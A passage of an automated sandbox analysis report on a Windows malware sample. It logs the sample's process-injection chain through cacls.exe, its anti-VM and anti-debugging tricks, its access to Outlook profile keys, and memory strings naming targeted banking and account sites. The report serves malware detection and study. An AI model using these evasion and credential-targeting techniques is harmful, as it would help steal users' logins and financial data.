                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess created: C:\Users\user\Desktop\hgq5nzWJll.exe "C:\Users\user\Desktop\hgq5nzWJll.exe"Jump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeSection loaded: textshaping.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: hgq5nzWJll.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: hgq5nzWJll.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: cacls.pdbGCTL source: hgq5nzWJll.exe, 00000003.00000002.1965992252.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000002.2619583932.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: cacls.pdb source: hgq5nzWJll.exe, 00000003.00000002.1965992252.00000000013E8000.00000004.00000020.00020000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000007.00000002.2619583932.0000000001497000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: jCNfinsYqEsIM.exe, 00000007.00000000.1891566384.000000000095E000.00000002.00000001.01000000.0000000C.sdmp, jCNfinsYqEsIM.exe, 00000009.00000002.2618668154.000000000095E000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: wntdll.pdbUGP source: hgq5nzWJll.exe, 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.1968407486.0000000003220000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.1965912160.0000000003023000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: hgq5nzWJll.exe, hgq5nzWJll.exe, 00000003.00000002.1966292766.0000000001840000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, cacls.exe, 00000008.00000003.1968407486.0000000003220000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.000000000356E000.00000040.00001000.00020000.00000000.sdmp, cacls.exe, 00000008.00000003.1965912160.0000000003023000.00000004.00000020.00020000.00000000.sdmp, cacls.exe, 00000008.00000002.2621426277.00000000033D0000.00000040.00001000.00020000.00000000.sdmp
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_05288220 push eax; mov dword ptr [esp], ecx0_2_05288224
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 0_2_071C42D7 push ebx; ret 0_2_071C42DA
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00414970 push ds; retf 3_2_00414996
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00419109 push cs; ret 3_2_0041910B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040C1FF pushad ; iretd 3_2_0040C202
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0041F19B pushfd ; ret 3_2_0041F1B3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_004149BC push ds; iretd 3_2_004149CE
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00402215 push es; retf 3_2_00402217
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040AB40 push es; ret 3_2_0040AB41
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0041F371 push ds; retf 3_2_0041F376
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0041844F push esp; retf 3_2_00418456
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00403460 push eax; ret 3_2_00403462
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00414515 push ds; retf 3_2_0041451C
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0041A5EB pushfd ; iretd 3_2_0041A62B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0041A5F3 pushfd ; iretd 3_2_0041A62B
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00417E58 push ecx; retf 3_2_00417E59
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00418F48 push cs; iretd 3_2_00418F4D
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0040671F pushad ; iretd 3_2_00406720
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018709AD push ecx; mov dword ptr [esp], ecx3_2_018709B6
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03295381 push 00000062h; iretd 7_2_03295383
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03294A80 push esp; retf 7_2_03294A87
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03287171 push es; ret 7_2_03287172
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03288830 pushad ; iretd 7_2_03288833
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_0329573A push cs; ret 7_2_0329573C
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03290FA1 push ds; retf 7_2_03290FC7
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03290FED push ds; iretd 7_2_03290FFF
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03295579 push cs; iretd 7_2_0329557E
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03282D50 pushad ; iretd 7_2_03282D51
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03291DAE push eax; iretd 7_2_03291DD9
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03296C1C pushfd ; iretd 7_2_03296C5C
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeCode function: 7_2_03294489 push ecx; retf 7_2_0329448A
                Source: hgq5nzWJll.exeStatic PE information: section name: .text entropy: 7.710588369204003
                Source: C:\Program Files (x86)\GxZHbvtdFNhFBEJpgwNUdJFuiqAllYkBLUyAxDhpaJ\jCNfinsYqEsIM.exeProcess created: C:\Windows\SysWOW64\cacls.exe "C:\Windows\SysWOW64\cacls.exe"
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Yara detected AntiVM3
                Source: Yara matchFile source: Process Memory Space: hgq5nzWJll.exe PID: 7420, type: MEMORYSTR
                Switches to a custom stack to bypass stack traces
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52D324
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52D7E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52D944
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52D504
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52D544
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52D1E4
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE530154
                Source: C:\Windows\SysWOW64\cacls.exeAPI/Special instruction interceptor: Address: 7FFEFE52DA44
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: 2A60000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: 2BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: 4BF0000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: 9060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: 7B10000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: A060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeMemory allocated: B060000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B096E rdtsc 3_2_018B096E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeAPI coverage: 0.7 %
                Source: C:\Windows\SysWOW64\cacls.exeAPI coverage: 2.6 %
                Source: C:\Users\user\Desktop\hgq5nzWJll.exe TID: 7444Thread sleep time: -922337203685477s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 8092Thread sleep count: 85 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\cacls.exe TID: 8092Thread sleep time: -170000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\cacls.exeCode function: 8_2_02C6C3D0 FindFirstFileW,FindNextFileW,FindClose,8_2_02C6C3D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: G8uE-69OL.8.drBinary or memory string: www.interactivebrokers.co.inVMware20,11696503903~
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: tasks.office.comVMware20,11696503903o
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696503903z
                Source: G8uE-69OL.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903^
                Source: G8uE-69OL.8.drBinary or memory string: www.interactivebrokers.comVMware20,11696503903}
                Source: G8uE-69OL.8.drBinary or memory string: microsoft.visualstudio.comVMware20,11696503903x
                Source: G8uE-69OL.8.drBinary or memory string: trackpan.utiitsl.comVMware20,11696503903h
                Source: G8uE-69OL.8.drBinary or memory string: bankofamerica.comVMware20,11696503903x
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - HKVMware20,11696503903]
                Source: G8uE-69OL.8.drBinary or memory string: global block list test formVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: secure.bankofamerica.comVMware20,11696503903|UE
                Source: G8uE-69OL.8.drBinary or memory string: ms.portal.azure.comVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: interactivebrokers.comVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: account.microsoft.com/profileVMware20,11696503903u
                Source: G8uE-69OL.8.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: AMC password management pageVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: turbotax.intuit.comVMware20,11696503903t
                Source: G8uE-69OL.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903}
                Source: cacls.exe, 00000008.00000002.2619118146.0000000002F31000.00000004.00000020.00020000.00000000.sdmp, jCNfinsYqEsIM.exe, 00000009.00000002.2619367877.000000000137F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: G8uE-69OL.8.drBinary or memory string: Canara Transaction PasswordVMware20,11696503903x
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696503903
                Source: firefox.exe, 0000000B.00000002.2263857738.0000026FB71CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllQQG
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696503903p
                Source: G8uE-69OL.8.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696503903n
                Source: G8uE-69OL.8.drBinary or memory string: outlook.office365.comVMware20,11696503903t
                Source: G8uE-69OL.8.drBinary or memory string: outlook.office.comVMware20,11696503903s
                Source: G8uE-69OL.8.drBinary or memory string: netportal.hdfcbank.comVMware20,11696503903
                Source: G8uE-69OL.8.drBinary or memory string: interactivebrokers.co.inVMware20,11696503903d
                Source: G8uE-69OL.8.drBinary or memory string: dev.azure.comVMware20,11696503903j
                Source: G8uE-69OL.8.drBinary or memory string: discord.comVMware20,11696503903f
                Source: G8uE-69OL.8.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696503903
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeProcess queried: DebugPortJump to behavior
                Source: C:\Windows\SysWOW64\cacls.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B096E rdtsc 3_2_018B096E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_00417823 LdrLoadDll,3_2_00417823
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018B0185 mov eax, dword ptr fs:[00000030h]3_2_018B0185
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F019F mov eax, dword ptr fs:[00000030h]3_2_018F019F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F019F mov eax, dword ptr fs:[00000030h]3_2_018F019F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F019F mov eax, dword ptr fs:[00000030h]3_2_018F019F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018F019F mov eax, dword ptr fs:[00000030h]3_2_018F019F
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186A197 mov eax, dword ptr fs:[00000030h]3_2_0186A197
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186A197 mov eax, dword ptr fs:[00000030h]3_2_0186A197
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0186A197 mov eax, dword ptr fs:[00000030h]3_2_0186A197
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01914180 mov eax, dword ptr fs:[00000030h]3_2_01914180
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01914180 mov eax, dword ptr fs:[00000030h]3_2_01914180
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192C188 mov eax, dword ptr fs:[00000030h]3_2_0192C188
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0192C188 mov eax, dword ptr fs:[00000030h]3_2_0192C188
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019361C3 mov eax, dword ptr fs:[00000030h]3_2_019361C3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019361C3 mov eax, dword ptr fs:[00000030h]3_2_019361C3
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE1D0 mov eax, dword ptr fs:[00000030h]3_2_018EE1D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE1D0 mov eax, dword ptr fs:[00000030h]3_2_018EE1D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE1D0 mov ecx, dword ptr fs:[00000030h]3_2_018EE1D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE1D0 mov eax, dword ptr fs:[00000030h]3_2_018EE1D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018EE1D0 mov eax, dword ptr fs:[00000030h]3_2_018EE1D0
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_019461E5 mov eax, dword ptr fs:[00000030h]3_2_019461E5
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_018A01F8 mov eax, dword ptr fs:[00000030h]3_2_018A01F8
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_01930115 mov eax, dword ptr fs:[00000030h]3_2_01930115
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191A118 mov ecx, dword ptr fs:[00000030h]3_2_0191A118
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191A118 mov eax, dword ptr fs:[00000030h]3_2_0191A118
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191A118 mov eax, dword ptr fs:[00000030h]3_2_0191A118
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191A118 mov eax, dword ptr fs:[00000030h]3_2_0191A118
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191E10E mov eax, dword ptr fs:[00000030h]3_2_0191E10E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191E10E mov ecx, dword ptr fs:[00000030h]3_2_0191E10E
                Source: C:\Users\user\Desktop\hgq5nzWJll.exeCode function: 3_2_0191E10E mov eax, dword ptr fs:[00000030h]3_2_0191E10E
